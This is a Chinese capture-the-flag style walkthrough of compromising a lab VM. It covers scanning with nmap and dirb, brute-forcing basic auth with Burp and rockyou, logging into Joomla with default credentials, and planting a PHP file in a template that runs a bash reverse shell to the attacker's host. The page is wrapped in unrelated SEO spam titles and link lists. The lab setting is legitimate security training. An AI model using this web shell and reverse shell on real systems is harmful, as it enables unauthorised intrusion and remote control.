当前位置: 首页 > wzjs >正文

做网站的背景怎么调整大小除了淘宝还有哪些购物网站

做网站的背景怎么调整大小,除了淘宝还有哪些购物网站,阿里巴巴网站域名,百度上传网站服务器1.开启靶机,确保网络适配器是NAT网段 2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169 nmap -O 192.168.139.1/24 3.访问该IP地址 4.访问robots.txt,什么也没有 5.扫描目录 dirb http://192.168.139.169 6.访问一下secret.txt 7.访问phpinfo.p…

1.开启靶机,确保网络适配器是NAT网段

2.借助kali虚拟机来确定该靶机的IP地址为192.168.139.169

nmap -O 192.168.139.1/24

3.访问该IP地址

4.访问robots.txt,什么也没有

5.扫描目录

dirb http://192.168.139.169

6.访问一下secret.txt

7.访问phpinfo.php

8.访问8080,尝试爆破这个密码

9.打开BP抓包,发现是base64编码

10.在secret.txt发现一些有用信息,要在kali里面进行操作

cd /usr/share/wordlists
ls
gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt
复制字典的前一百个生成一个txt,后面爆破用。

11.打开BP进行抓包,抓8080端口的包

12.发送到Intrder模块进行爆破,开始攻击

爆破出状态码200,然后解码,账号密码为joker:hannah

13.进行登录

14.登陆成功可以发现该网站是由joomla架构,尝试使用默认账号密码joomla

15.点击后台管理系统

16.用户名和密码joomla

17.可以看到这是他网站的一些模板

18.这里可以新建文件

19.新建666.php写入木马,利用菜刀或者蚁剑进行链接

<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");?>

20.利用kali监听

21.访问http://192.168.139.169:8080/templates/beez3/666.php

回到kali查看是否监听到

http://www.dtcms.com/wzjs/814401.html

相关文章:

  • 温州网站建设备案建立网站目录结构时正确的建议是
  • 豆瓣网站是怎么建设的做网站去什么公司
  • 网站建设公司的方案wordpress绿竹主题
  • 军人运动会官方网站建设目标打电话做网站的话术
  • 易网拓做网站多少钱有限责任公司破产法人承担的责任
  • 建设机械网站机构营销型网站建设iop
  • 免费商城网站模板下载江苏省建是国企吗
  • 长沙网站推广¥做下拉去118cr电子商城网站模板
  • wordpress双语站wordpress不用邮箱
  • 做俄罗斯外贸网站推广门户设计模板
  • 都是些什么企业需要建设网站滨江区高端网站建设
  • 从事建站业务还有前景吗网站建设简介联系方式
  • 青岛网站建设服务网页游戏传奇霸主
  • 手机怎样做刷赞网站惠州seo博客报价
  • 山西省经济建设投资公司网站店铺logo图片免费
  • 设置网站的黑名单怎么做服务类网站怎么做
  • 个人网站设计论文前言嘉兴建站模板系统
  • 建立企业网站要多少钱wordpress好插件
  • 杭州哪家网站建设好shein跨境电商平台
  • 免费数据源网站python做网站吗
  • 通付盾 建设网站公司农村电商平台
  • 网站建设要求有哪些企业网站免费建站
  • 辽宁双高建设专题网站公司网站建设代理
  • 医院网站建设存在问题枞阳网站制作
  • 网站开发调试iis虚拟搭建wordpress
  • 建设一个图片下载网站烟台门户网站
  • 郴州网站运营公司广告推广话术
  • 西安网站维护兼职梵美传媒网站是谁做的
  • 西安做网站的公司哪家好p9制作公司
  • 做平面的公司网站网店代运营销售